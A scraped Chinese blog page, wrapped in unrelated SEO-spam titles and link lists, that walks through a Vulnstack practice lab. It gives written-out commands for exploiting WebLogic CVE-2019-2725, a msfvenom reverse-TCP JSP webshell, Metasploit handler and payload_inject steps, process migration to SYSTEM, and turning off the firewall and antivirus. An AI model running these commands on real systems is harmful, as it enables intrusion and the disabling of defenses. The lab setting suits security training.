当前位置: 首页 > news >正文

我的世界官方网站铁马铠怎么做企业微信会话内容存档

我的世界官方网站铁马铠怎么做,企业微信会话内容存档,12380网站建设存在的问题,做网站兰州靶场下载来自: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场统一登录密码:1qazWSX 按大佬的说法是 环境需要模拟内网和外网两个网段,PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web…

靶场下载来自:

http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

靶场统一登录密码:1qaz@WSX

按大佬的说法是

环境需要模拟内网和外网两个网段,PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网

这是pc的配置

这是DC的配置

web的配置和pc的配置一样就行,就是两台网络适配器

将新增的网卡VMnet2,子网ip调成10段。

这是官网的环境说明

可以看到dmz网段,也就是外网网段是写成了192.168.111.1/24

我们最后还要用ipconfig查看各主机的ip

WEB主机

PC主机

DC主机

以及我们的kali

WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin

以管理员身份运行strartWebLogic.cmd后环境就搭建好了

首先用nmap扫描一下目标IP

nmap -sS -sV -Pn -T4 192.168.111.80

-sS                                                       使用TCP的SYN进行扫描,很少在目标主机上留下扫描日志

-sV                                                       探测服务/版本信息

-Pn                                                       将所有主机视为在在线,跳过主机发现,可以穿过防火墙

-T4                                                       代表扫描时间间隔

nmap的使用见:

nmap详细使用教程_nmap使用教程-CSDN博客

我们可以百度一下开放这些端口可能会存在些什么代表性的漏洞

445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。

7001端口说明目标IP存在weblogic服务可能存在反序列化,SSRF,任意文件上传,后台路径泄露

开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞

放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。

开放3389端口,就存在远程桌面。

常见的端口及可能存在的漏洞参考文章:

https://www.cnblogs.com/zcg-cpdd/p/14630766.html

在此之前我们还需要下weblogicscan

weblogicscan工具地址:

1.https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip

2.https://github.com/dr0op/WeblogicScan.git

执行命令

python WeblogicScan.py -u ip -p 7001

存在两个CVE漏洞,CVE-2017-3506、CVE-2019-2725

存在后台路径,还存在一个SSRF漏洞

SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

知道了存在CVE-2019-2725的漏洞,使用msf查看一下漏洞利用脚本

msfconsole
search CVE-2019-2725
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

在此之前我们还需要下载一个java反序列化工具

下载链接见:

Releases · shack2/javaserializetools · GitHub

下第一个就行

java -jar 文件 即可运行

执行

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.136 LPORT=4444 -f jsp > /root/test.jsp

把shell写到控制台images目录中

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马

msf开启监听,访问shell.jsp,获得回话,administrator权限

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

msf操作教程见:

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

我们用shell systeminfo命令

用chcp 65001解决出现的乱码

我们用ps命令查看进程

getpid查看进程号,得到

进程迁移到system权限进程services

百度了一下,更多见:Services.exe是什么?如何辨别services.exe是否为病毒?-太平洋IT百科

migrate 512,进程迁移后是system权限

netsh advfirewall set allprofiles state off 关闭防火墙

run killav 关闭杀软

内网

打开cs创建一个监听器

这里需要注意的就是cs需要java11

我们在cmd界面用java -version可以查看此时的java版本

创建监听器

执行命令

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.235.129
set lport 8888
set session 2
run

在cs中进行提权

http://www.mnyf.cn/news/42985.html

相关文章:

  • 高端网站设计工作室爱站网关键词
  • 山东住房和城乡建设厅官网奶盘seo伪原创工具
  • 做网站推广选哪家网络推广费用预算表
  • 怎么做 niche网站衡阳seo快速排名
  • 17网站一起做网店新塘营销型网站的分类
  • 个人网页制作教程简单深圳seo优化排名
  • 北京便宜做网站万能搜索网站
  • 做导购网站赚钱网络营销seo优化
  • 网站的数据运营怎么做郑州网站推广方案
  • 软件开发 网站建设口碑营销理论
  • 佛山做网站格国内外搜索引擎大全
  • 点餐小程序开发深圳网站营销seo电话
  • 中山网站专业制作开淘宝店铺怎么运营推广
  • 安平做网站做推广电话百度视频下载
  • 保安公司的网站设计比较好的网站seo技术
  • 昌图网站推广软件培训班
  • 免费网站建设公司代理技能培训学校
  • 网站界面类型免费网站建站2773
  • 陕西中洋建设工程有限公司网站网络营销推广培训机构
  • 做网站协议书广西seo搜索引擎优化
  • 租号网站建设贴吧seo程序
  • wordpress中的邮箱seo搜狗排名点击
  • 上海知名网站开发公司免费正规的接单平台
  • 阿里云可以做几个网站91永久免费海外地域网名
  • c 做游戏的网站教学seo教程论坛
  • 福建设计招聘网站aso优化教程
  • 建设项目经济评价网站怎么制作小程序
  • 网站开发实践厦门网站seo
  • WordPress搭建主题短视频seo排名加盟
  • supercell账号注册网站什么网站都能打开的浏览器